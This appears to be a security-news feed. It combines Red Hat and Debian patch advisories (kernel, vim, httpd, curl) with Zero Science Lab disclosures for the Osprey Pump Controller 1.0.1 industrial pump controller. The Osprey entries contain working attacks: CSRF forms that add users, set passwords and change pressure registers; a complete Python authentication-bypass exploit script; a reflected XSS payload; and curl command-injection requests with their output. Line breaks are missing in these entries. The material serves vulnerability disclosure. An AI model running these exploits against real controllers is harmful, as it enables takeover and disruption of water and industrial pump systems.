Red Hat Security Advisory 2023-0945-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:0945-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0945  
Issue date:        2023-02-28  
CVE Names:         CVE-2022-4378   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux  
7.7 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server E4S (v. 7.7) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: stack overflow in do_proc_dointvec and proc_skip_spaces  
(CVE-2022-4378)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2152548 - CVE-2022-4378 kernel: stack overflow in do_proc_dointvec and proc_skip_spaces

6. Package List:

Red Hat Enterprise Linux Server E4S (v. 7.7):

Source:  
kpatch-patch-3_10_0-1062_68_1-1-1.el7.src.rpm  
kpatch-patch-3_10_0-1062_70_1-1-1.el7.src.rpm

ppc64le:  
kpatch-patch-3_10_0-1062_68_1-1-1.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1062_68_1-debuginfo-1-1.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1062_70_1-1-1.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1062_70_1-debuginfo-1-1.el7.ppc64le.rpm

x86_64:  
kpatch-patch-3_10_0-1062_68_1-1-1.el7.x86_64.rpm  
kpatch-patch-3_10_0-1062_68_1-debuginfo-1-1.el7.x86_64.rpm  
kpatch-patch-3_10_0-1062_70_1-1-1.el7.x86_64.rpm  
kpatch-patch-3_10_0-1062_70_1-debuginfo-1-1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-4378  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY/3zwNzjgjWX9erEAQgckw/7B9elFpmuesMfyPfX2TOojH8y3cplE1Bl  
MkYwIDtD1hsuQPs+CyAczXmybgFA2E+Lruldm9MI3qcyKkQDUjsKUTyO+OKqPQz/  
TgohO3q04tg/uEMGod96pcj5gn+/wddXzMH69tWLkAGlj+IS7vaj1zcCzpqoRkBL  
Ld4QCi4lAZcByXn8KZpcqT8SUJhhCHcSwJjgjBiiWlMuh1BQpTcnaOU+YSRUK7ox  
e/eRn3KzkXf0mEp648t6SLs74IFrmlgtswUGZYxRGVBZnm9U1hl8uIFOMZNeekKf  
TL2K+r2KwcFEOAr1q2oVaaqgNyr1r/P094rZqUtdah80gu8xnaH2nXV7pjOH2xy8  
oorD/XpbZyg6/3XZwKRGMVJkcyqBaUiNy9I85qi0kffk52rQWjP88TKPM9Nq5S2T  
ZkmLOgTNelWNsv10KwR87K+rg9+F+GlFTEtGwUOcmlLEVwd+cAJb6HAXJrBULXCA  
5WNQacQtJ4JQ6iSaZfNRDfsHk44cXzeSMpyKDqZUlaVsZaq4BtgHMRfnSNLnw1k1  
N2rsmA2Dp6+CHY4nStTOsFIqCqh7HHqVLxUxIoGegwTdzbD59EdCICiIOj9bUJDL  
62urASH/uAxCFMFPaAx2JefEZkwCzPYJVTxoejFnESSkkxJ5rIrxiz05HgNVkA/g  
SfHzKU8H41E=  
=xuoe  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0945-01

Osprey Pump Controller version 1.0.1 suffers from a cross site request forgery vulnerability.

CSRF Add User:--------------<html>  <body>    <form action="http://TARGET/setSystemText.php">      <input type="hidden" name="sysTextValue" value="test" />      <input type="hidden" name="sysTextName" value="USERNAME1" />      <input type="hidden" name="backTargetLinkNumber" value="75" />      <input type="hidden" name="userName" value="ZSL" />      <input type="submit" value="Add user" />    </form>  </body></html>CSRF Set Password:------------------<html>  <body>    <form action="http://TARGET/setSystemText.php">      <input type="hidden" name="sysTextValue" value="pass" />      <input type="hidden" name="sysTextName" value="USERPW1" />      <input type="hidden" name="backTargetLinkNumber" value="75" />      <input type="hidden" name="userName" value="t00t" />      <input type="submit" value="Set pass" />    </form>  </body></html>CSRF Set System Pressure Raw:-----------------------------<html>  <body>    <form action="http://TARGET/mbSetRegister_Int.php">      <input type="hidden" name="regValue" value="17301" />      <input type="hidden" name="regAddress" value="40900" />      <input type="hidden" name="minValue" value="0" />      <input type="hidden" name="maxValue" value="32767" />      <input type="hidden" name="backTargetLinkNumber" value="414" />      <input type="hidden" name="userName" value="w00t" />      <input type="submit" value="Modify pressure" />    </form>  </body></html>

Osprey Pump Controller 1.0.1 Cross Site Request Forgery

Osprey Pump Controller version 1.0.1 allows an unauthenticated attacker to create an account and bypass authentication, thereby gaining unauthorized access to the system.

    #!/usr/bin/env python### Osprey Pump Controller 1.0.1 Authentication Bypass Credentials Modification### Vendor: ProPump and Controls, Inc.# Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com# Affected version: Software Build ID 20211018, Production 10/18/2021#                   Mirage App: MirageAppManager, Release [1.0.1]#                   Mirage Model 1, RetroBoard II### Summary: Providing pumping systems and automated controls for# golf courses and turf irrigation, municipal water and sewer,# biogas, agricultural, and industrial markets. Osprey: door-mounted,# irrigation and landscape pump controller.## Technology hasn't changed dramatically on pump and electric motors# in the last 30 years. Pump station controls are a different story.# More than ever before, customers expect the smooth and efficient# operation of VFD control. Communications—monitoring, remote control,# and interfacing with irrigation computer programs—have become common# requirements. Fast and reliable accessibility through cell phones# has been a game changer.## ProPump & Controls can handle any of your retrofit needs, from upgrading# an older relay logic system to a powerful modern PLC controller, to# converting your fixed speed or first generation VFD control system to# the latest control platform with communications capabilities.## We use a variety of solutions, from MCI-Flowtronex and Watertronics# package panels to sophisticated SCADA systems capable of controlling# and monitoring networks of hundreds of pump stations, valves, tanks,# deep wells, or remote flow meters.## User friendly system navigation allows quick and easy access to all# critical pump station information with no password protection unless# requested by the customer. Easy to understand control terminology allows# any qualified pump technician the ability to make basic changes without# support. Similar control and navigation platform compared to one of the# most recognized golf pump station control systems for the last twenty# years make it familiar to established golf service groups nationwide.# Reliable push button navigation and LCD information screen allows the# use of all existing control panel door switches to eliminate the common# problems associated with touchscreens.## Global system configuration possibilities allow it to be adapted to# virtually any PLC or relay logic controlled pump stations being used in# the industrial, municipal, agricultural and golf markets that operate# variable or fixed speed. On board Wi-Fi and available cellular modem# option allows complete remote access.## Desc: A vulnerability has been discovered in the web panel of Osprey pump# controller that allows an unauthenticated attacker to create an account# and bypass authentication, thereby gaining unauthorized access to the# system. The vulnerability stems from a lack of proper authentication# checks during the account creation process, which allows an attacker# to create a user account without providing valid credentials. An attacker# who successfully exploits this vulnerability can gain access to the pump# controller's web panel, and cause disruption in operation, modify data,# change other usernames and passwords, or even shut down the controller# entirely.## The attacker can leverage their unauthorized access to the# system to carry out a variety of malicious activities, including:# Modifying pump settings, such as flow rates or pressure levels, causing# damage or loss of control, stealing sensitive data, such as system logs# or customer information, changing passwords and other user credentials,# potentially locking out legitimate users or allowing the attacker to# maintain persistent access to the system, disabling or shutting down# the controller entirely, potentially causing significant disruption to# operations and service delivery.## ----------------------------------------------------------------------# $ ./accpump.py 192.168.0.25 root rewt# [ ok ]# [ ok ]# Login with 'root:rewt' -> Register Access Menu.# ----------------------------------------------------------------------## Tested on: Apache/2.4.25 (Raspbian)#            Raspbian GNU/Linux 9 (stretch)#            GNU/Linux 4.14.79-v7+ (armv7l)#            Python 2.7.13 [GCC 6.3.0 20170516]#            GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git#            PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33)### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic# Macedonian Information Security Research and Development Laboratory# Zero Science Lab - https://www.zeroscience.mk - @zeroscience### Advisory ID: ZSL-2023-5752# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5752.php### 05.01.2023#import requestsimport sys as sif len(s.argv)!=4:    print("Osprey Pump Controller Bypass Exploit")    print("Arguments: [host] [username] [password]")    exit(-3)else:    url=s.argv[1]    usr=s.argv[2]    pwd=s.argv[3]    if not "http" in url:        url="http://{}".format(url)## Data names .  Values## USERNAME0  .  user# USERNAME1  .# USERNAME2  .# USERNAME3  .# USERNAME4  .# USERPW0    .  1234# USERPW1    .# USERPW2    .# USERPW3    .# USERPW4    .#url+="/"url+="setSystemText"url+=".php"paru={"sysTextValue"        :usr,      "sysTextName"         :"USERNAME3",      "backTargetLinkNumber":75,      "userName"            :"ZSL"}parp={"sysTextValue"        :pwd,      "sysTextName"         :"USERPW3",      "backTargetLinkNumber":75,      "userName"            :"WriteExploit"}r=requests.get(url,params=paru)if 'System String "USERNAME3" set' in r.text:    print("[ ok ]")else:    print(f"Error: {r.status_code} {r.reason} - {r.text}")r=requests.get(url,params=parp)if 'System String "USERPW3" set' in r.text:    print("[ ok ]")    print(f"Login with '{usr}:{pwd}' ",end="")    print("-> Register Access Menu.")else:    print(f"Error: {r.status_code} {r.reason} - {r.text}")

Osprey Pump Controller 1.0.1 Authentication Bypass

Debian Linux Security Advisory 5365-1 - Patrick Monnerat discovered that Curl's support for "chained" HTTP compression algorithms was susceptible to denial of service.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5365-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
February 27, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : curl  
CVE ID         : CVE-2023-23916

Patrick Monnerat discovered that Curl's support for "chained" HTTP  
compression algorithms was susceptible to denial of service.

For the stable distribution (bullseye), this problem has been fixed in  
version 7.74.0-1.3+deb11u7. This update also fixes a regression in  
the previously released fix for CVE-2022-27774.

We recommend that you upgrade your curl packages.

For the detailed security status of curl please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/curl

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmP9Il4ACgkQEMKTtsN8  
TjZKEA//cK64gwXlsdkBMurkfaS4XVzPfAIPoR3b9Zun57OnO79Hb+Lubj23iva0  
PpnHi5cyLDRC4RkQrICAygGGZkqBg0s5kA2aNv6sNF4CrF01cDHi5xbeb8SIb3K2  
S6n/UOXST1zWlPjPsewoe+ct1dC53+24pelwVWNB8fRdvnbD49XQQ7eI8hZAWJpt  
ebFXkfi7xOPrSgHJdOyHAjJK3qySqfOgfbBY3qy650Po3SHS+YAqztRl+/TQf/Al  
fonzIypIHpcTDUyzJ9qBfLTUbui0HgjiaQbepp42+mUb/ajtbSlVHf+a+MXUm2Vr  
5kE7SDdoXTQDHkdiuo0SFpxOhhGG3BV7RecX+4tKnfTP5ADr2MZ0XnVq5RJ6y9eL  
1JOTxdFBPIIjzIpdCN2NrQdSXEk9faZv6L3HXoUA92rtXaxdqYD0UkNsOBYjBtJT  
4TZOS3br3bsYUxveFGeJsHA0DTcv+k6NtHxE9XyTvPwjPZyAgck35K+4zPZkQxO1  
fHGWXVCODsPm6g/TzPP1GrBzuLGS9fbhAF2+cVQkSPoO8eS7salDkR4k7HCshNuY  
5qhLi5PQCTrlIhOfOueRoBj0dYtR96WePh8K6mQ1gA/KtQ+n/Ps+Obpnv75cdOF8  
K03rqj/CFODZ/IqinIUr+8b+Pt50kTenU4Z6pacqleEz4WcVePc=  
=7ySA  
-----END PGP SIGNATURE-----

Debian Security Advisory 5365-1

Osprey Pump Controller version 1.0.1 suffers from a cross site scripting vulnerability.

    Osprey Pump Controller 1.0.1 Unauthenticated Reflected XSSVendor: ProPump and Controls, Inc.Product web page: https://www.propumpservice.com | https://www.pumpstationparts.comAffected version: Software Build ID 20211018, Production 10/18/2021                  Mirage App: MirageAppManager, Release [1.0.1]                  Mirage Model 1, RetroBoard IISummary: Providing pumping systems and automated controls forgolf courses and turf irrigation, municipal water and sewer,biogas, agricultural, and industrial markets. Osprey: door-mounted,irrigation and landscape pump controller.Technology hasn't changed dramatically on pump and electric motorsin the last 30 years. Pump station controls are a different story.More than ever before, customers expect the smooth and efficientoperation of VFD control. Communications—monitoring, remote control,and interfacing with irrigation computer programs—have become commonrequirements. Fast and reliable accessibility through cell phoneshas been a game changer.ProPump & Controls can handle any of your retrofit needs, from upgradingan older relay logic system to a powerful modern PLC controller, toconverting your fixed speed or first generation VFD control system tothe latest control platform with communications capabilities.We use a variety of solutions, from MCI-Flowtronex and Watertronicspackage panels to sophisticated SCADA systems capable of controllingand monitoring networks of hundreds of pump stations, valves, tanks,deep wells, or remote flow meters.User friendly system navigation allows quick and easy access to allcritical pump station information with no password protection unlessrequested by the customer. Easy to understand control terminology allowsany qualified pump technician the ability to make basic changes withoutsupport. Similar control and navigation platform compared to one of themost recognized golf pump station control systems for the last twentyyears make it familiar to established golf service groups nationwide.Reliable push button navigation and LCD information screen allows theuse of all existing control panel door switches to eliminate the commonproblems associated with touchscreens.Global system configuration possibilities allow it to be adapted tovirtually any PLC or relay logic controlled pump stations being used inthe industrial, municipal, agricultural and golf markets that operatevariable or fixed speed. On board Wi-Fi and available cellular modemoption allows complete remote access.Desc: Input passed to the GET parameter 'userName' is not properly sanitisedbefore being returned to the user. This can be exploited to execute arbitraryHTML/JS code in a user's browser session in context of an affected site.Tested on: Apache/2.4.25 (Raspbian)           Raspbian GNU/Linux 9 (stretch)           GNU/Linux 4.14.79-v7+ (armv7l)           Python 2.7.13 [GCC 6.3.0 20170516]           GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git           PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2023-5751Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5751.php05.01.2023--http://TARGET/index.php?userName=%22%3E%3Cscript%3Econfirm(251)%3C/script%3E

Osprey Pump Controller 1.0.1 Cross Site Scripting

Osprey Pump Controller version 1.0.1 suffers from an unauthenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the eventFileSelected HTTP GET parameter called by DataLogView.php, EventsView.php and AlarmsView.php scripts.

    Osprey Pump Controller 1.0.1 (eventFileSelected) Command InjectionVendor: ProPump and Controls, Inc.Product web page: https://www.propumpservice.com | https://www.pumpstationparts.comAffected version: Software Build ID 20211018, Production 10/18/2021                  Mirage App: MirageAppManager, Release [1.0.1]                  Mirage Model 1, RetroBoard IISummary: Providing pumping systems and automated controls forgolf courses and turf irrigation, municipal water and sewer,biogas, agricultural, and industrial markets. Osprey: door-mounted,irrigation and landscape pump controller.Technology hasn't changed dramatically on pump and electric motorsin the last 30 years. Pump station controls are a different story.More than ever before, customers expect the smooth and efficientoperation of VFD control. Communications—monitoring, remote control,and interfacing with irrigation computer programs—have become commonrequirements. Fast and reliable accessibility through cell phoneshas been a game changer.ProPump & Controls can handle any of your retrofit needs, from upgradingan older relay logic system to a powerful modern PLC controller, toconverting your fixed speed or first generation VFD control system tothe latest control platform with communications capabilities.We use a variety of solutions, from MCI-Flowtronex and Watertronicspackage panels to sophisticated SCADA systems capable of controllingand monitoring networks of hundreds of pump stations, valves, tanks,deep wells, or remote flow meters.User friendly system navigation allows quick and easy access to allcritical pump station information with no password protection unlessrequested by the customer. Easy to understand control terminology allowsany qualified pump technician the ability to make basic changes withoutsupport. Similar control and navigation platform compared to one of themost recognized golf pump station control systems for the last twentyyears make it familiar to established golf service groups nationwide.Reliable push button navigation and LCD information screen allows theuse of all existing control panel door switches to eliminate the commonproblems associated with touchscreens.Global system configuration possibilities allow it to be adapted tovirtually any PLC or relay logic controlled pump stations being used inthe industrial, municipal, agricultural and golf markets that operatevariable or fixed speed. On board Wi-Fi and available cellular modemoption allows complete remote access.Desc: The pump controller suffers from an unauthenticated OS commandinjection vulnerability. This can be exploited to inject and executearbitrary shell commands through the 'eventFileSelected' HTTP GETparameter called by DataLogView.php, EventsView.php and AlarmsView.phpscripts.Tested on: Apache/2.4.25 (Raspbian)           Raspbian GNU/Linux 9 (stretch)           GNU/Linux 4.14.79-v7+ (armv7l)           Python 2.7.13 [GCC 6.3.0 20170516]           GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git           PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2023-5750Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5750.php05.01.2023--$ curl -s http://TARGET/DataLogView.php?eventFileSelected=;id$ curl -s http://TARGET/EventsView.php?eventFileSelected=|id$ curl -s http://TARGET/AlarmsView.php?eventFileSelected=`id`HTTP/1.1 200 OKuid=33(www-data) gid=33(www-data) groups=33(www-data)

Osprey Pump Controller 1.0.1 eventFileSelected Command Injection

Red Hat Security Advisory 2023-0958-01 - Vim is an updated and improved version of the vi editor.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: vim security update  
Advisory ID:       RHSA-2023:0958-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0958  
Issue date:        2023-02-28  
CVE Names:         CVE-2022-47024   
=====================================================================

1. Summary:

An update for vim is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Vim (Vi IMproved) is an updated and improved version of the vi editor.

Security Fix(es):

* vim: no check if the return value of XChangeGC() is NULL (CVE-2022-47024)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2163613 - CVE-2022-47024 vim: no check if the return value of XChangeGC() is NULL

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

aarch64:  
vim-X11-8.2.2637-20.el9_1.aarch64.rpm  
vim-X11-debuginfo-8.2.2637-20.el9_1.aarch64.rpm  
vim-common-8.2.2637-20.el9_1.aarch64.rpm  
vim-common-debuginfo-8.2.2637-20.el9_1.aarch64.rpm  
vim-debuginfo-8.2.2637-20.el9_1.aarch64.rpm  
vim-debugsource-8.2.2637-20.el9_1.aarch64.rpm  
vim-enhanced-8.2.2637-20.el9_1.aarch64.rpm  
vim-enhanced-debuginfo-8.2.2637-20.el9_1.aarch64.rpm  
vim-minimal-debuginfo-8.2.2637-20.el9_1.aarch64.rpm

ppc64le:  
vim-X11-8.2.2637-20.el9_1.ppc64le.rpm  
vim-X11-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm  
vim-common-8.2.2637-20.el9_1.ppc64le.rpm  
vim-common-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm  
vim-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm  
vim-debugsource-8.2.2637-20.el9_1.ppc64le.rpm  
vim-enhanced-8.2.2637-20.el9_1.ppc64le.rpm  
vim-enhanced-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm  
vim-minimal-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm

s390x:  
vim-X11-8.2.2637-20.el9_1.s390x.rpm  
vim-X11-debuginfo-8.2.2637-20.el9_1.s390x.rpm  
vim-common-8.2.2637-20.el9_1.s390x.rpm  
vim-common-debuginfo-8.2.2637-20.el9_1.s390x.rpm  
vim-debuginfo-8.2.2637-20.el9_1.s390x.rpm  
vim-debugsource-8.2.2637-20.el9_1.s390x.rpm  
vim-enhanced-8.2.2637-20.el9_1.s390x.rpm  
vim-enhanced-debuginfo-8.2.2637-20.el9_1.s390x.rpm  
vim-minimal-debuginfo-8.2.2637-20.el9_1.s390x.rpm

x86_64:  
vim-X11-8.2.2637-20.el9_1.x86_64.rpm  
vim-X11-debuginfo-8.2.2637-20.el9_1.x86_64.rpm  
vim-common-8.2.2637-20.el9_1.x86_64.rpm  
vim-common-debuginfo-8.2.2637-20.el9_1.x86_64.rpm  
vim-debuginfo-8.2.2637-20.el9_1.x86_64.rpm  
vim-debugsource-8.2.2637-20.el9_1.x86_64.rpm  
vim-enhanced-8.2.2637-20.el9_1.x86_64.rpm  
vim-enhanced-debuginfo-8.2.2637-20.el9_1.x86_64.rpm  
vim-minimal-debuginfo-8.2.2637-20.el9_1.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 9):

Source:  
vim-8.2.2637-20.el9_1.src.rpm

aarch64:  
vim-X11-debuginfo-8.2.2637-20.el9_1.aarch64.rpm  
vim-common-debuginfo-8.2.2637-20.el9_1.aarch64.rpm  
vim-debuginfo-8.2.2637-20.el9_1.aarch64.rpm  
vim-debugsource-8.2.2637-20.el9_1.aarch64.rpm  
vim-enhanced-debuginfo-8.2.2637-20.el9_1.aarch64.rpm  
vim-minimal-8.2.2637-20.el9_1.aarch64.rpm  
vim-minimal-debuginfo-8.2.2637-20.el9_1.aarch64.rpm

noarch:  
vim-filesystem-8.2.2637-20.el9_1.noarch.rpm

ppc64le:  
vim-X11-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm  
vim-common-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm  
vim-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm  
vim-debugsource-8.2.2637-20.el9_1.ppc64le.rpm  
vim-enhanced-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm  
vim-minimal-8.2.2637-20.el9_1.ppc64le.rpm  
vim-minimal-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm

s390x:  
vim-X11-debuginfo-8.2.2637-20.el9_1.s390x.rpm  
vim-common-debuginfo-8.2.2637-20.el9_1.s390x.rpm  
vim-debuginfo-8.2.2637-20.el9_1.s390x.rpm  
vim-debugsource-8.2.2637-20.el9_1.s390x.rpm  
vim-enhanced-debuginfo-8.2.2637-20.el9_1.s390x.rpm  
vim-minimal-8.2.2637-20.el9_1.s390x.rpm  
vim-minimal-debuginfo-8.2.2637-20.el9_1.s390x.rpm

x86_64:  
vim-X11-debuginfo-8.2.2637-20.el9_1.x86_64.rpm  
vim-common-debuginfo-8.2.2637-20.el9_1.x86_64.rpm  
vim-debuginfo-8.2.2637-20.el9_1.x86_64.rpm  
vim-debugsource-8.2.2637-20.el9_1.x86_64.rpm  
vim-enhanced-debuginfo-8.2.2637-20.el9_1.x86_64.rpm  
vim-minimal-8.2.2637-20.el9_1.x86_64.rpm  
vim-minimal-debuginfo-8.2.2637-20.el9_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-47024  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY/3zu9zjgjWX9erEAQjjqw//RfPjkA9+ULyz/haWxVeFiOp4pKtsrL6l  
Zbah1fUhP4U+JrjzxGTrRPGpNXDlxV6xm8Po79jk7VfsZ2VekOaspp/hCqs7PQbW  
8Wc7jkPpUh9Lk0elFvvyxIQ6OZEjT+pfTvu0orbLC4cJwAbM7cylT/uZlBiMqQWQ  
FDETC9NzwZkKtOL6Nw+r04Qa1VEszWM17wbGWboMT2abXgLT/C/sGOcGh7id+Jbr  
7NEuzrG18lq1jRTSWU72Pmz+Vxd0mk4mwS2YcZh9uYDLYOcKcDOWQzQH1Y341fO3  
ZcsKNCtrW1ZTqXcZYiv/4Tn4ttELdM0Rt+SiOnE7H6G1GA3FCo4NmBk9mx8BQX10  
r9I+TJllCAM1zr/HVIA95oWpji2np7cT3fxzMwkor5OBlGsVukFws4ZabEWgO/Jo  
I6rLp6Ips+KA73chHAGCdbz3bAjcfFJMqPoxFKS0XGh7d1lT6+zGax1NhsJDkIdM  
TG1SwtA54UeaQboKPLdQTKXiAlNA6hG0cc5g0PKvwpGKrVNb/g+rB5lMhhNq0lkC  
53mSm9fB5IZPsjJB3qYDvhKFUhfrBKZZtlZ0rc4+g7AyOGqx48QaJb2u5MgXg512  
ZXYDMWsZdgT9s9mIUNgKRmIj1z+qnrmX21XTFqvpn6Fb6Ss5CT7HCaUwkKkwWj2O  
4nohN9fIiz4=  
=Evof  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0958-01

Red Hat Security Advisory 2023-0970-01 - The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server. Issues addressed include HTTP response splitting and out of bounds read vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: httpd security and bug fix update  
Advisory ID:       RHSA-2023:0970-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0970  
Issue date:        2023-02-28  
CVE Names:         CVE-2006-20001 CVE-2022-36760 CVE-2022-37436   
=====================================================================

1. Summary:

An update for httpd is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The httpd packages provide the Apache HTTP Server, a powerful, efficient,  
and extensible web server.

Security Fix(es):

* httpd: mod_dav: out-of-bounds read/write of zero byte (CVE-2006-20001)

* httpd: mod_proxy_ajp: Possible request smuggling (CVE-2022-36760)

* httpd: mod_proxy: HTTP response splitting (CVE-2022-37436)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* httpd-init fails to create localhost.crt, localhost.key due to "sscg"  
default now creates a /dhparams.pem and is not idempotent if the file  
/dhparams.pem already exists. (BZ#2165975)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the updated packages, the httpd daemon will be restarted  
automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2161773 - CVE-2022-37436 httpd: mod_proxy: HTTP response splitting  
2161774 - CVE-2006-20001 httpd: mod_dav: out-of-bounds read/write of zero byte  
2161777 - CVE-2022-36760 httpd: mod_proxy_ajp: Possible request smuggling

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
httpd-2.4.53-7.el9_1.1.src.rpm

aarch64:  
httpd-2.4.53-7.el9_1.1.aarch64.rpm  
httpd-core-2.4.53-7.el9_1.1.aarch64.rpm  
httpd-core-debuginfo-2.4.53-7.el9_1.1.aarch64.rpm  
httpd-debuginfo-2.4.53-7.el9_1.1.aarch64.rpm  
httpd-debugsource-2.4.53-7.el9_1.1.aarch64.rpm  
httpd-devel-2.4.53-7.el9_1.1.aarch64.rpm  
httpd-tools-2.4.53-7.el9_1.1.aarch64.rpm  
httpd-tools-debuginfo-2.4.53-7.el9_1.1.aarch64.rpm  
mod_ldap-2.4.53-7.el9_1.1.aarch64.rpm  
mod_ldap-debuginfo-2.4.53-7.el9_1.1.aarch64.rpm  
mod_lua-2.4.53-7.el9_1.1.aarch64.rpm  
mod_lua-debuginfo-2.4.53-7.el9_1.1.aarch64.rpm  
mod_proxy_html-2.4.53-7.el9_1.1.aarch64.rpm  
mod_proxy_html-debuginfo-2.4.53-7.el9_1.1.aarch64.rpm  
mod_session-2.4.53-7.el9_1.1.aarch64.rpm  
mod_session-debuginfo-2.4.53-7.el9_1.1.aarch64.rpm  
mod_ssl-2.4.53-7.el9_1.1.aarch64.rpm  
mod_ssl-debuginfo-2.4.53-7.el9_1.1.aarch64.rpm

noarch:  
httpd-filesystem-2.4.53-7.el9_1.1.noarch.rpm  
